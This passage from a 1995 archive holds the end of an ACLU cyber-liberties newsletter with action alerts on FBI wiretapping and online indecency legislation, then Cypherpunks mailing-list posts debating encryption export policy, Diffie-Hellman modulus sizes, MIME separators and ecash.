"The proposal would dramatically reduce the privacy rights in the United States because it would -- no matter what the Justice Department says -- result in significant increase in the number of innocent third party conversations intercepted by law enforcement officials," Murphy said. "Already too many innocent conversations -- nearly two million in the last year alone -- are intercepted by federal and local law enforcement wiretaps."

According to the government's own statistics, 1,800 innocent conversations are intercepted each and every time a wiretap or other form of electronic surveillance is placed.

Just last week, the ACLU joined with the National Rifle Association and a broad coalition of other gun advocates and civil liberties organizations in calling for Congress to institute a 24-point reform plan for federal law enforcement. In a letter to Congress, the groups said that the excesses of Waco and Ruby Ridge demonstrate that Congress and the Administration must begin to rein in the powers of federal police authorities.

[The 24-point reform plan and related documents are available on America Online, at keyword ACLU, under "federal law enforcement reforms." For an e-mailed copy of the reform plan, send a message to infoaclu at aclu.org with "fed law enforcement reform" in the subject line.]

URGENT ACTION NEEDED:

-Call the FBI at 202-252-7296 and urge it to withdraw the proposed wiretapping system. You can also find the phone number of the FBI's local field offices at the FBI web site at http://www.fbi.gov.
-Call the Attorney General at 202-514-2001 and urge her to order the FBI to withdraw its wiretapping proposal. -Call your members of Congress and tell them to urge the Justice Department and the FBI to withdraw the wiretap proposal. Urge your representatives to oppose any funding for this wiretap scheme. You can reach the Capitol Switchboard at 202-224-3121 for the Senate and 202-225-3121 for the House of Representatives. -Call Rep. Bob Barr (R-GA), a former federal prosecutor and leading opponent of funding efforts for wiretap: Rep. Bob Barr U.S. House of Representatives 1607 Longworth Building Washington, DC 20515 (202) 225-2931 -Call your own telephone companies, both local and long distance, and urge them to oppose the wiretap proposal and to stand up for the privacy rights of their customers instead of becoming the snooping arm of a prying government. ----------------------------------------------------------------- * ACTION ALERT on Federal Online Indecency Legislation The conference committee on the telecommunications bill will soon consider whether to remove provisions that would make "indecency" a crime in cyberspace. On Monday, November 6, we distributed an action alert urging individuals to call Congress to express opposition to any measures to censor the Net. THIS MAY BE YOUR LAST CHANCE TO STOP UNCONSTITUTIONAL RESTRICTIONS ON YOUR RIGHT TO FREE SPEECH IN CYBERSPACE!! [You can find the action alert on America Online, at keyword ACLU, under "threats to civil liberties in cyberspace," or on the Internet at http://www.vtw.org/] In addition to the call to action for individual Net users, the ACLU and People for the American Way obtained signatures from over 75 organizations to a letter opposing the federal online indecency provisions. The letter will be sent to Senator Pressler and Representative Bliley on the conference committee later this week. 
[After 11/13, you can find a copy of the organizational letter on America Online, at keyword ACLU, under "threats to civil liberties in cyberspace." To receive a copy of the letter via e-mail, send a message to infoaclu at aclu.org with "organizations opposed to online censorship" in the subject line.] The ACLU continues to prepare for a constitutional challenge to the online censorship provisions if they become law. Please contact Ann Beeson, beeson at aclu.org, if your organization is interested in being a plaintiff in this ground-breaking litigation that will define First Amendment rights in cyberspace. ----------------------------------------------------------------- STATE PAGE (Legislation/Agency/Court Cases) ----------------------------------------------------------------- * State Utility Commissions Consider Online Access and Privacy Issues Many state utilities commissions are considering issues that can affect your online access and privacy rights, from approving caller ID to defining universal access. Online users are urged to stay informed and involved in utilities commission decisions in their states that may affect cyberspace rights. Consumer Project on Technology has put up a list of information about state utility commissions. The list includes contact information for all 50 state utility commissions, and also lists utility consumer advocates in 40 states. See http://www.essential.org/cpt/isdn/contacts.html ----------------------------------------------------------------- * News on Electronic Access to Public Information in Washington State A Washington State task force has been examining the issue of electronic access to information maintained by government agencies. The ACLU of Washington submitted comments commending the task force for requiring some form of free electronic access, and limiting all fees to incremental costs. 
But the task force was criticized for not paying sufficient attention to privacy, especially increased threats to privacy presented by accumulation of information on individuals from diverse sources. Also in Washington State, King County Superior Court Judge George Finkle ruled that Geographical Information System databases are public records and must be made available to the public for nominal copying fees. (GIS systems are databases that contain information associated with a physical location, such as the location of utility cables, public buildings, roads, demographic information, zoning info, or traffic density.) As in many locations around the country, the City of Bellevue had attempted to charge far higher fees for GIS databases, which were created for government use but also have commercial value. This ruling reaffirms the notion that public information should be available to all, not just those with deep pockets. ----------------------------------------------------------------- * John Perry Barlow Launches Cyberspace Lecture Series Co-Sponsored by the ACLU of Washington The ACLU of Washington began a series of talks in Seattle to explore the impact and implications of the technology revolution on art and culture. John Perry Barlow, former Grateful Dead lyricist and co-founder of the Electronic Frontier Foundation, launched the series on November 3rd. "Cyberspace is largely about conversation that ultimately could include everybody on the planet . . . . Cyberspace can be the greatest venue for freedom of expression humans have ever had," said Barlow. Barlow talked of the spiritual dimension of cyberspace, which he sees as an egalitarian ecosystem with the potential to link "every synapse on the planet." For him cyberspace must be a place where anybody can say anything they think without fear of reprisal. 
But he tempered his lyrical vision of cyberculture with a warning of the dangers of censorship from elected officials who do not appreciate -- or even understand -- how new forms of communication function. "When I visit Congress, I feel like Tom Paine in the Court of King George," Barlow quipped. ----------------------------------------------------------------- * ACLU-Georgetown University Law Center President Writes Articles on the Marty Rimm controversy Alan Lewine, President of the ACLU student chapter at GULC, has written a series of articles for the Georgetown Law Weekly on the Georgetown Law Journal's involvement in the controversial publication of Marty Rimm's purported study of net porn. They are available at http://www.tripod.com/userland/A/alewine/index.html ----------------------------------------------------------------- CONFERENCES ----------------------------------------------------------------- Nov 8, 6 pm: "Regulating the Internet: Should Pornography Have A Free Ride on the Information Superhighway?" Benjamin N. Cardozo School of Law, 55 Fifth Avenue, New York, New York. Panelists include Nadine Strossen, National President, ACLU; Bill Burrington, Staff Counsel of the Electronic Frontier Foundation; and Barbara Bennett Woodhouse, Professor of Law at University of Pennsylvania Law School. Sponsored by the Cardozo Arts & Entertainment Law Journal. Nov 16, 5 pm: Nadine Strossen (National President, ACLU) speaks on "Defending Pornography: A Feminist Perspective on New Technologies and Old-Fashioned Sex," GULC, 600 New Jersey NW, 12th Floor Ballroom, Gewirz Hall. Co-sponsored by ACLU-GULC and the Student Bar Association Speakers Fund. ----------------------------------------------------------------- ONLINE RESOURCES FROM THE ACLU NATIONAL OFFICE ----------------------------------------------------------------- Stay tuned for news on the ACLU's world wide web site, under construction at http://www.aclu.org. 
America Online users should check out our live chats, auditorium events, *very* active message boards, and complete news on civil liberties, at keyword ACLU. ----------------------------------------------------------------- ONLINE RESOURCES FROM ACLU STATE AFFILIATES ----------------------------------------------------------------- Florida: ACLU of Pinellas County Florida http://www.stpt.usf.edu/~greek/aclu.html Illinois: Illinois Civil Liberties Union http://www.aclu-il.org/ Champaign County, Illinois ACLU Chapter http://www.prairienet.org/cc-aclu/ (The chapter also maintains an Illinois Civil Liberties Alert List. To subscribe send a message to cla at prairienet.org) Indiana: Indiana Civil Liberties Union http://www.inetdirect.net/iclu/ South Carolina: ACLU of South Carolina http://www.cris.com/~katrinan/aclu/index.html ----------------------------------------------------------------- ACLU Cyber-Liberties Update Editor: Ann Beeson (beeson at aclu.org) American Civil Liberties Union National Office 132 West 43rd Street New York, New York 10036 To subscribe to the ACLU Cyber-Liberties Update, send a message to infoaclu at aclu.org with "subscribe Cyber-Liberties Update" in the subject line of your message. To terminate your subscription, send a message to infoaclu at aclu.org with "unsubscribe Cyber-Liberties Update" in the subject line. For general information about the ACLU, write to infoaclu at aclu.org. ----------------------------------------------------------------- **PLEASE REPOST WITH HEADER INTACT** From raph at CS.Berkeley.EDU Wed Nov 8 18:44:36 1995 From: raph at CS.Berkeley.EDU (Raph Levien) Date: Thu, 9 Nov 1995 10:44:36 +0800 Subject: PGP Comment feature weakens remailer security In-Reply-To: <199511081943.LAA24863@kiwi.cs.berkeley.edu> Message-ID: <199511090147.RAA31271@kiwi.cs.berkeley.edu> > I think you are fine if the odds of corrupting the message are less than > the odds of getting hit by a falling meteor while running the program. 
> In general there is little point in making any one part of the system > many orders of magnitude more reliable than any other part. I agree entirely. That's why my PGP key at school is 382 bits. It's a lot easier to compromise my machine than factor a 382 bit number. So let me rephrase the question: what's the minimum number of entropy bits that can be used and still give you that warm and fuzzy feeling that you don't have to worry about the possibility that the message might be corrupted? The winning answer gets a free mention in the PGP/MIME Implementation notes Web page: http://www.c2.org/~raph/impl.html Raph From tcmay at got.net Wed Nov 8 18:47:32 1995 From: tcmay at got.net (Timothy C. May) Date: Thu, 9 Nov 1995 10:47:32 +0800 Subject: This is an Architext Document: Read Carefully! Message-ID: At 8:54 PM 11/8/95, Kevin S. Van Horn wrote: >A small point of information. I work for Architext, the company that provides >the excite service. We only keep the last two weeks of USENET news around, >and don't keep any archives going further back than that. USENET is just too >damn huge for us to go to the trouble of keeping comprehensive archives around >without good evidence of demand for it among our target audience. Small world. "Architext" is also the hypertext program I use to cross-index many articles. I'm surprised the new company, also called "Architext," picked a name which will increase confusion. ("Architext," BrainPower, Inc., Agoura Hills, CA.) No Cypherpunks relevance, except to show how name collisions can occur. --Tim May Views here are not the views of my Internet Service Provider or Government. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. 
"National borders are just speed bumps on the information superhighway." From jya at pipeline.com Wed Nov 8 19:14:09 1995 From: jya at pipeline.com (John Young) Date: Thu, 9 Nov 1995 11:14:09 +0800 Subject: Industry Group Rebuffs U.S. on Encryption Message-ID: <199511090232.VAA00163@pipe1.nyc.pipeline.com> The New York Times, November 8, 1995. Industry Group Rebuffs U.S. On Encryption By John Markoff The campaign by the Clinton Administration to create a standard for data encryption acceptable to industry, civil liberties and law enforcement groups broke down yesterday when a group including some of the nation's most powerful technology companies rejected a compromise proposal. The aim is to set a policy that meets the needs of electronic commerce as well as the concerns of the National Security Agency and other Federal offices that are opposed to the proliferation of data-coding software, feeling it will make it impossible for them to gather intelligence overseas. The Administration offered a compromise plan and had been seeking comment from the public. But the industry coalition said yesterday that it found the Government unwilling to compromise. Thus, the group of 37 companies said, it would formulate its own policy proposal to present to the White House and to Congress in the next six months. High-technology industries want a data-coding standard secure enough that both businesses and overseas customers could use it for sensitive financial and business correspondence. They seek a longer and more powerful encryption key than the Government is willing to grant, and object to Government demands that law enforcement agencies have "back-door" access to such transmissions that would allow them to intercept coded messages. 
The letter is signed by several of the country's leading computer, software and on-line companies, among them America Online, Apple Computer, AT&T, Eastman Kodak, I.B.M.'s Lotus Development division, MCI Communications, Microsoft, Novell, Oracle, Sybase and Tandem Computers. On Aug. 17, the Administration proposed a liberalization of export-control procedures for "key escrow" software products, or those providing law-enforcement access. "The current policy directive also does not address the need for immediate liberalization of current export restrictions," the letter said. "Such liberalization is vital to enable U.S. companies to export state-of-the-art software products during the potentially lengthy process of developing and adopting a comprehensive national cryptography policy." [End] ---------- The Washington Post, November 8, 1995 Encryption Control Plan Sparks Industry Protest High-Tech Groups Say Proposals Unworkable By Elizabeth Corcoran High-technology companies and advocacy groups are writing to Vice President Gore and House Speaker Newt Gingrich to protest what they contend are unworkable federal proposals for controlling the export of data scrambling technology. The letters deepen an industry-government rift that began only days after federal officials unveiled an outline of what they hoped would be a palatable plan at an industry meeting in August. Two separate coalitions are criticizing the administration's draft proposal, which the government circulated on the Internet on Monday. Current export regulations prohibit companies from sending overseas any encryption, or data-scrambling technology, that exceeds a certain degree of sophistication. The government argues that it needs to be able to peek at messages and files with proper court authorization -- to do its job of protecting U.S. citizens from terrorist groups and other malevolent organizations. 
In July, some French students demonstrated they could readily break the type of encryption technology that the U.S. government lets companies export. In August, the administration said it would let companies include more complex types of encryption, provided they pledged to entrust to an authorized agent a "spare key," or the means for unscrambling the information. Unlike early proposals in which the government said it would hold such keys, the administration is suggesting that companies and individuals would be able to select private keyholders, much the way people pick their banks. But after a brief honeymoon, industry and civil liberties groups began to find flaws with the details in the new proposals. This week's letters indicate that whatever fragile compromise the government had hoped it had found has grown even weaker. One coalition, pulled together by the Washington advocacy group Center for Democracy and Technology, includes about three dozen high-tech companies and associations. The group has promised to draft an alternative plan within six months. "There is a very serious message here: that national security can't be controlling the Internet," said Jerry Berman, executive director of the center. "There are other issues, global competitiveness and privacy, that need to be placed in the balance -- and the administration's policy doesn't do that." A second coalition of about 10 free-market and libertarian groups, led by another policy group, Americans for Tax Reform, plans to send their letter to Gingrich in the next day or two. The group contends the administration's encryption proposals are an encroachment on citizens' civil rights. The administration's proposals would not restrict the encryption technologies that people use within U.S. boundaries. But it would require that if they electronically send an encrypted message to parties outside the United States, a spare key must be stored with an authorized agency. 
"Even though we recognize [the administration] has worked hard on its proposals, it's not the right direction," said Rebecca Gould, director of policy at the Business Software Alliance, a trade association of software firms. "We've been in this [debate] since July 1994," she added, a long time for companies that churn out a new version of most products every 18 months. "That means lost sales for us and a loss of U.S. industry sales abroad." [End] ---------- Both slipped by gummed eyes, thx gnu. From karn at qualcomm.com Wed Nov 8 20:13:09 1995 From: karn at qualcomm.com (Phil Karn) Date: Thu, 9 Nov 1995 12:13:09 +0800 Subject: Photuris Primality verification needed In-Reply-To: <199511081833.TAA10801@soikko.cs.hut.fi> Message-ID: <199511090347.TAA04403@servo.qualcomm.com> >Including the provision for the 512 bit prime is *HARMFUL* and >*DANGEROUS*. Export control is not really an issue here, because if >companies in the United States cannot provide secure networking, >there are other companies in the world that can. You've convinced me. I remove my proposal to include a recommended 512-bit modulus. The smallest standard modulus will remain 1024-bits. Phil From adam at lighthouse.homeport.org Wed Nov 8 20:32:28 1995 From: adam at lighthouse.homeport.org (Adam Shostack) Date: Thu, 9 Nov 1995 12:32:28 +0800 Subject: Photuris Primality verification needed In-Reply-To: <199511090337.TAA04357@servo.qualcomm.com> Message-ID: <199511090418.XAA07907@homeport.org> You might want to offer a number of strong moduli in the 1024-1500 bit range. Having multiple strong moduli in the same size (speed) range reduces the value of going after a particular one. We all know how security software tends to stay deployed longer than it really should. Adam Phil Karn wrote: | Thanks. That's pretty much what we are doing -- requiring a particular | 1024-bit modulus but recommending several others as options. 
There's a | 2048 bit optional modulus and may even be a 4096-bit option if I can | find one in reasonable time. There was going to be a 512-bit optional | modulus but the group has reacted so strongly to it that I'm willing to | withdraw it. -- "It is seldom that liberty of any kind is lost all at once." -Hume From karn at qualcomm.com Wed Nov 8 21:10:46 1995 From: karn at qualcomm.com (Phil Karn) Date: Thu, 9 Nov 1995 13:10:46 +0800 Subject: Photuris Primality verification needed In-Reply-To: <199511090418.XAA07907@homeport.org> Message-ID: <199511090454.UAA04547@servo.qualcomm.com> >You might want to offer a number of strong moduli in the 1024-1500 bit >range. Having multiple strong moduli in the same size (speed) range We already have a secondary 1024-bit modulus in the spec. The question is whether the problem is better solved by allowing parties to use private moduli rather than by filling up the spec with additional moduli. Remember that the original reason for specifying a particular modulus as "required" is to guarantee some minimum degree of interoperability, not to meet every possible threat. Phil From ohuf at relay.sedat.de Wed Nov 8 21:11:51 1995 From: ohuf at relay.sedat.de (Oliver Huf) Date: Thu, 9 Nov 1995 13:11:51 +0800 Subject: Exporting software doesn't mean exporting In-Reply-To: Message-ID: On Tue, 7 Nov 1995, Peter D. Junger wrote: > >From Section 120.17 of the ITAR which provides: > > _Export_ means: > . . . . > (4) Disclosing (including oral or visual disclosure) or transferring > technical data to a foreign person, whether in the United States or > abroad . . . . The ITAR is U.S.-Law. This only applies (by definition) to US-citizens or persons in the U.S.! I think it's a common mistake of many Americans that they believe creating law means creating law for the whole world! > Go read the section that I quoted again. Where is there an exception > for foreign persons who happen to be abroad? It's inherent. 
You simply can't apply US-law to non-US-citizens outside the U.S.! oli. From jcobb at ahcbsd1.ovnet.com Wed Nov 8 22:03:34 1995 From: jcobb at ahcbsd1.ovnet.com (James M. Cobb) Date: Thu, 9 Nov 1995 14:03:34 +0800 Subject: Virus-Blocker Message-ID: Friend, This item from 11 07 95 Edupage may be of interest to you: VIRUS-BLOCKER McAfee Associates has a new product called WebScan that identifies virus-tainted programs before they're downloaded and warns the user not to continue. Security experts say WebScan is the first product that prevents viruses from infecting a computer to begin with, rather than attacking the problem after it's already occurred. (Wall Street Journal 6 Nov 95 B6) Cordially, Jim NOTE To subscribe to Edupage, send a message to: listproc@educom.unc.edu In the body of the message type: subscribe edupage From jamesd at echeque.com Wed Nov 8 22:39:05 1995 From: jamesd at echeque.com (James A. Donald) Date: Thu, 9 Nov 1995 14:39:05 +0800 Subject: PGP Comment feature weakens remailer security Message-ID: <199511090618.WAA21037@blob.best.net> At 05:47 PM 11/8/95 -0800, Raph Levien wrote: > So let me rephrase the question: what's the minimum number of entropy > bits that can be used and still give you that warm and fuzzy feeling > that you don't have to worry about the possibility that the message > might be corrupted? I guess that if comet hits the earth and exterminates the human race you would not be unduly worried by a corrupted message, so let us make the odds equal to human civilization being destroyed on the same day. We get roughly one massive extinction every hundred million years, or so and a smaller blast that would demolish our technology every ten million years or So the probability of an error was equal to the human race and most major species being destroyed the same day, you would not be unduly worried. 
Probability of human civilization and all large animals being wiped out by comet impact tonight is 2.7E-11, so thirty five bits should be sufficient. But, if you want to feel really comfortable, make it forty bits. The probability of hitting a forty bit combination by chance is equal to the probability that all large animals on earth will be wiped out by comet impact in the next three quarters of an hour. But you might have a million lines, and send a million messages, each of a million lines. So let us make the probability that one of those fails equal to the chance that all large animals on earth get wiped out in the next half hour. Well in that case make it eighty bits. --------------------------------------------------------------------- | We have the right to defend ourselves | http://www.jim.com/jamesd/ and our property, because of the kind | of animals that we are. True law | James A. Donald derives from this right, not from the | arbitrary power of the state. | jamesd at echeque.com From jsw at netscape.com Wed Nov 8 22:54:27 1995 From: jsw at netscape.com (Jeff Weinstein) Date: Thu, 9 Nov 1995 14:54:27 +0800 Subject: DejaNews all over again In-Reply-To: <199511082306.PAA24448@jobe.shell.portal.com> Message-ID: <30A19E4E.348A@netscape.com> anonymous-remailer at shell.portal.com wrote: > Afterall, Netscape (and AT&T) have had, over THREE WEEKS to work on this > problem or to make some form of public comment, and have done nothing, but > put some of their programmers -- unofficially ... speaking for myself ... > not speaking for the Company -- programmers on this list I was posting here before your supposed "flaw" was posted. I have never been told that I should or should not participate on this list by anyone at netscape. 
> Meanwhile people are having their PGP keyrings collected, their passwords > monitored, and all of the information -- even information which they have > NOT posted to Usenet, information that is simply on their personal hard > drives, or on a private corporate network that is behind a firewall -- > collected by anyone who actually understands *how* to use Netscape > Navigator's standard features to do it. Please show us some proof. All you have done is post unfounded allegations backed up by flawed logic and a misunderstanding of the technology. Send me a URL, and I will point my navigator at it. If you can collect my PGP key ring you can gloat here or anywhere else. --Jeff -- Jeff Weinstein - Electronic Munitions Specialist Netscape Communication Corporation jsw at netscape.com - http://home.netscape.com/people/jsw Any opinions expressed above are mine. From viking at pacifier.com Wed Nov 8 23:26:39 1995 From: viking at pacifier.com (Robert East) Date: Thu, 9 Nov 1995 15:26:39 +0800 Subject: Register Message-ID: Register I'd like to sign up for email Bob From scottst at ionet.net Thu Nov 9 00:22:50 1995 From: scottst at ionet.net (Scott Staedeli) Date: Thu, 9 Nov 1995 16:22:50 +0800 Subject: Pegasus Mail 2.20 Message-ID: <199511090804.CAA20494@ion1.ionet.net> The new beta release of Pegasus Mail (one of the better e-mail apps available) has a new feature: -------------------------------------------------------------- Runtime-loadable encryptor/decryptor modules for Pegasus Mail. Pegasus Mail System, Copyright (c) 1990-95, David Harris, All Rights Reserved -------------------------------------------------------------- The hot topic on everyone's lips is "privacy". And, as usual, the computer industry is in the process of confusing and disrupting the issue beyond recognition... We have factions all over the place each arguing passionately for its own most beloved encryption scheme, and some of the rhetoric is getting pretty heated. 
Add to the proliferation of interests the USA's ridiculous export laws on encryptors and the sum is trouble. As far as I can tell, encryption is going through what seems to be an industry-standard cycle of chaos: everyone suddenly realises there's a lack/opportunity/need and rushes to promote the idea they like best; a small war develops during which the users and peripheral developers are left bemused and bewildered amongst the welter of extravagant claims and counter-claims, then eventually (usually after two or three years of total pandemonium) the group with the most clout (although not necessarily the best product) will win out and become "the standard". I've been through this rat race several times and have no desire whatever to go through it again; on the other hand, my USERS have very legitimate concerns about privacy. So what do I do? Easy - I pass the buck. WinPMail v2.2 and later supports third-party, runtime loadable modules to handle encryption and decryption of mail. A special mechanism has been defined that allows Pegasus Mail to detect that a third party encryptor has been used and to determine whether the matching decryptor is available on the system. The built-in encryptor will remain available for those sites who only need moderate levels of message security. WinPMail will define an open interface for third-party encryptors and it is then up to other people to write the code. What I envisage actually happening is people writing "shell interfaces" for WinPMail - i.e., modules that take the calls I make and translate them into calls to other programs, such as PGP or whatever, returning the result. Let the games begin. --scottst at ionet.net------http://www.ionet.net/~scottst-- >~<^xXx | "The Internet is simply a means of xX # | communication. Efforts to stop infor- (XXX) # | mation by enjoining it are doomed to (XXXXXXX) | failure in a free society." DON'T TREAD ON ME| -- Prof. 
Frank Tuerkheimer ======================================================== =========NSA trip phrase of the week: DEUTERIUM========= From stewarts at ix.netcom.com Thu Nov 9 01:31:52 1995 From: stewarts at ix.netcom.com (Bill Stewart) Date: Thu, 9 Nov 1995 17:31:52 +0800 Subject: ecash speed Message-ID: <199511090914.BAA08391@ix.ix.netcom.com> >"Perry E. Metzger" writes: >>I suspect that as CPU speed exponentiates this will become less and >>less of a problem. It doesn't especially worry me. CPU speed in desktop or notebook computers isn't much problem; CPU speed in smartcards is still an issue, and it may be one or two more rounds of exponentiation before we'll see cards that are both fast enough and really secure. At 09:08 PM 11/8/95 -0800, Hal wrote: >Consider, though, what happens in the current ecash system if it were >used to charge a penny per page. You would click on a link in your web >browser to go to the new page. It would set the GET request to the >remote server as usual. For penny-a-page on-line services, unless ecash transaction costs are _radically_ cheap, it probably makes more sense for the service to sell its own tokens, bought with (anonymous or non-anonymous) ecash, which you then trade for pages. No calculation required, just an on-line lookup for double-spending and you don't get your page if you double-spend. An alternative to them picking the token numbers is for you to give them the numbers and them to keep them in their database, but that's probably unlikely to be done and doesn't really buy you much privacy. If that's not anonymous enough for you (because your IP address could be traced when you buy the tokens, and coordinated with them later), use a packet laundry, or connect from your dialup access provider, which will tell the newspaper you're port43.server29.netcom.com or something equally uninformative; or dial in from the public library or cafe. 
#-- # Thanks; Bill # Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com # Phone +1-510-247-0663 Pager/Voicemail 1-408-787-1281 From stewarts at ix.netcom.com Thu Nov 9 01:37:44 1995 From: stewarts at ix.netcom.com (Bill Stewart) Date: Thu, 9 Nov 1995 17:37:44 +0800 Subject: "Industry Group Rebuffs U.S. on Encryption" (NYT 8Nov95, C3) Message-ID: <199511090914.BAA08379@ix.ix.netcom.com> At 04:50 PM 11/8/95 -0800, you wrote: >A group of 37 companies and trade and privacy associations sent a >letter to Al Gore yesterday, complaining about Clipper-II and crypto >export controls, and promising to send their own policy proposals >to Congress and the Administration within six months. We talked about this at dinner - what kind of proposals can industry offer, other than "128 bits and honest escrow" or "64 bits and no escrow"? "128 bits now, with no escrow if you want any campaign contributions this fall" or simply "get stuffed, we're all buying our crypto from Europe and including it in all our products" ? According to one of the newspaper articles, the gang of 37 is a Jerry Berman/CDT coordination, so I don't expect one of the more radical answers from them, but maybe they'll do the right thing. The fact that Netscape is including secure email in their Navigator next release can be a big lever pushing the Feds toward giving up, and perhaps deserves some publicity once the release version is out the door. #-- # Thanks; Bill # Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com # Phone +1-510-247-0663 Pager/Voicemail 1-408-787-1281 From tcmay at got.net Thu Nov 9 18:21:36 1995 From: tcmay at got.net (Timothy C. May) Date: Thu, 9 Nov 95 18:21:36 PST Subject: Market Value of Web Pages Message-ID: At 1:43 AM 11/10/95, Mark wrote: (Description of a Web page earning $3,600,000 a year elided.) 
>If you toss arguments like this at some of the sites that would be viable for
>the hit numbers and then explain the only way that will occur is if the crypto
>laws are repealed, you will create a lot more lobbiers annoying their reps
>for the cause. ecash without good crypto is like the Federal Reserve
>delivering cash with open pickup trucks. Or doing credit card purchases on
>postcards.

And if you make arguments that this is easy to do, and add that crypto laws are stopping this from happening, you risk losing your credibility.

The current crypto export laws are a pain, but are not stopping these "million hits a day" transactions. Recall that the 40 bits allowed in Netscape for export took some non-trivial number of machine-hours to crack (I'm talking about the brute force crack by Damien G. and others, not the more recent exploitation of the RNG weakness). While this brute force crack showed the limitations of the 40-bit key for certain transactions, it is not a viable attack on a single transaction whose value is pennies.

As to the "$3.6 million a year," nice work if you can get it. I fully expect some folks to make a lot of money. But beware the siren call of make.money.fast...most people won't.

In any case, let's not claim that the lack of strong exportable crypto is the reason these "Web millionaires" are not all around us. (Actually, a lot of them are, but because their companies are doing so well, not because their home pages are getting a million hits a day.)

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May | Crypto Anarchy: encryption, digital money,
tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA | knowledge, reputations, information markets,
Higher Power: 2^756839 | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."

From jya at pipeline.com Thu Nov 9 04:54:35 1995
From: jya at pipeline.com (John Young)
Date: Thu, 9 Nov 1995 20:54:35 +0800
Subject: Coding-Export Limits Opposed
Message-ID: <199511091239.HAA07833@pipe4.nyc.pipeline.com>

The New York Times, November 9, 1995, p. D4.

Coding-Export Limits Opposed

The political right has joined the opposition to the Clinton Administration's proposed restriction on the export of data-coding systems.

A group of 12 conservative organizations -- including the National Rifle Association, Americans for Tax Reform and the Competitive Enterprise Institute -- sent a letter yesterday to House Speaker Newt Gingrich protesting Administration efforts to limit the export of cryptographic software and hardware.

Calling the proposal anti-consumer, anti-business and anti-progress, the groups urged Mr. Gingrich to support the relaxation of export controls. "The Administration's approach is the wrong policy for today's marketplace," the letter stated.

The letter to Mr. Gingrich followed one sent on Tuesday to Vice President Al Gore from 37 corporate and public-policy groups, including the Microsoft Corporation and America Online Inc. The letter to Mr. Gore opposed Administration efforts to strike a compromise that would limit the strength of encryption software exports and require an escrowed code-key system, which would contain trapdoor access for American law enforcement agencies.

[End]

From dl at hplyot.obspm.fr Thu Nov 9 06:15:26 1995
From: dl at hplyot.obspm.fr (Laurent Demailly)
Date: Thu, 9 Nov 1995 22:15:26 +0800
Subject: Mime/multipart (was Re: PGP Comment feature weakens remailer security)
In-Reply-To: <199511080454.UAA05765@jobe.shell.portal.com>
Message-ID: <9511091356.AA09725@hplyot.obspm.fr>

Raph Levien writes:
> On an unrelated topic... cypherpunks like to count bits, right?
> What is the correct number of pseudorandom bits to use in a MIME
> multipart separator? If the data has a line which matches the
> separator, the message is corrupted. Of course, if you can take
> multiple passes through the data, you can simply verify that it does
  ***************
  No need !
> not contain a line which matches the separator. But if you're
> restricted to a single pass, then the only way to do it is to use a
> randomly generated separator.

I've waited a bit, but as nobody seems to have pointed out, you can
definitely find a unique stream in a *single* pass (but maybe what you
really want is no pass at all ?)
{you add a new random byte each time you find your sequence in the
stream, and go forward (as the previous separator was not in the
"past" of the stream, you don't need to go back)}

What am I missing ? (anyway, see below)
(I hope my answer is not as clueless as the "A-dice anonymous" one)

> I figure that 128 bits should _definitely_ be enough (that's what
> is in the new premail code now). Even 64 bits should ensure that it is
> unlikely that anyone will ever experience message corruption over the
> expected lifetime of premail. However, it makes me nervous. What do
> people think?

Isn't PGP encoded stream containing only base64 chars ? Why not use
"====PGP part #====" (as you can't have more than 2 = in a base 64,
and only at the end anyway)
or "@PGP part #" or whatever starting with a non base64 char ?

so "@" = 8 bits is my answer, do I win ;-) ?

dl
--
Laurent Demailly * http://hplyot.obspm.fr/~dl/ * Linux|PGP|Gnu|Tcl|... Freedom
Prime#1: cent cinq mille cent cinq milliards cent cinq mille cent soixante sept
Greenpeace Uzi NORAD DES NSA [Hello to all my fans in domestic surveillance] Clinton

From perry at piermont.com Thu Nov 9 06:34:33 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Thu, 9 Nov 1995 22:34:33 +0800
Subject: PGP Comment feature weakens remailer security
In-Reply-To: <199511090147.RAA31271@kiwi.cs.berkeley.edu>
Message-ID: <199511091413.JAA15288@jekyll.piermont.com>

Raph Levien writes:
> > I think you are fine if the odds of corrupting the message are less than
> > the odds of getting hit by a falling meteor while running the program.
> > In general there is little point in making any one part of the system
> > many orders of magnitude more reliable than any other part.
>
> I agree entirely. That's why my PGP key at school is 382 bits. It's a
> lot easier to compromise my machine than factor a 382 bit number.

On the other hand, it costs nothing by most people's standards to use a 1024 bit key, so why not use one? I find that there is only a point in using low security for anything in particular when there is a perceivable cost to it -- if the cost is typing a different number while doing key generation, I don't see why one should suffer the tradeoff.

Perry

From jamesd at echeque.com Thu Nov 9 06:39:50 1995
From: jamesd at echeque.com (James A. Donald)
Date: Thu, 9 Nov 1995 22:39:50 +0800
Subject: Cybercensor in Singapore
Message-ID: <199511091425.GAA00125@blob.best.net>

At 06:15 PM 11/8/95 +0100, Anonymous wrote:
> The Government has blunted an uncensored
> Internet forum on Singapore political life by assembling
> a group of users who make sure the Government's views are
> represented.

That is censorship?

I visited the Singapore forum a few months ago --

When I visited Cuba (physically) everyone was visibly afraid.

When I visited the Singapore electronically, they were not afraid.

---------------------------------------------------------------------
                                      |
We have the right to defend ourselves | http://www.jim.com/jamesd/
and our property, because of the kind |
of animals that we are. True law      | James A. Donald
derives from this right, not from the |
arbitrary power of the state.         | jamesd at echeque.com

From perry at piermont.com Thu Nov 9 06:49:39 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Thu, 9 Nov 1995 22:49:39 +0800
Subject: Photuris Primality verification needed
In-Reply-To: <199511090337.TAA04357@servo.qualcomm.com>
Message-ID: <199511091430.JAA15324@jekyll.piermont.com>

Phil Karn writes:
> >I don't know. Maybe the right thing to do is require conforming
> >implementations to support a large modulus but include recommended
> >smaller moduli. Then Alice can always force Bob to use the large
> >modulus but, if both agree, they can use something smaller from the
> >standard or even their own home-grown modulus.
>
> Thanks. That's pretty much what we are doing -- requiring a particular
> 1024-bit modulus but recommending several others as options.

I think Brian is also suggesting that it would be good if people could negotiate new and previously unheard of moduli if they wanted to.

Perry

